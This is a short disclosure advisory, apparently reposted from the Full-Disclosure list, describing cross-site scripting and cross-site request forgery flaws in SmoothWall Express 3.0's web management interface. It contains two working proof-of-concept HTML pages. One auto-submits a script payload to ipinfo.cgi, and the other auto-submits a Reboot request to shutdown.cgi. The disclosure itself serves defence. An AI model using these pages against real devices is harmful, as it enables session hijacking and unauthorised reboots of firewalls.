SmoothWall Express 3.0 Cross Site Request Forgery / Cross Site Scripting

2011-01-18 / 2015-01-01
Credit: Shakespeare
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-79

The web management interface of SmoothWall Express 3.0 is vulnerable to xss and csrf. xss example: <html> <title> SmoothWall Express 3.0 xss </title> <body> <form action="http://192.168.0.1:81/cgi-bin/ipinfo.cgi" method="post" id="xssplz"> <input type="hidden" name="IP" value='"<script>alert(1);</script>'></input> <input type="hidden" name="ACTION" value='Run'></input> </form> <script>document.getElementById("xssplz").submit();</script> </body> csrf example: <html> <title> SmoothWall Express 3.0 csrf </title> <body> <form action="http://192.168.0.1:81/cgi-bin/shutdown.cgi" method="post" id="csrfplz"> <input type="hidden" name="ACTION" value='Reboot'></input> </form> <script>document.getElementById("csrfplz").submit();</script> </body> -- Something's rotten in the state of Denmark. -- Shakespeare _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com

 

Back to Top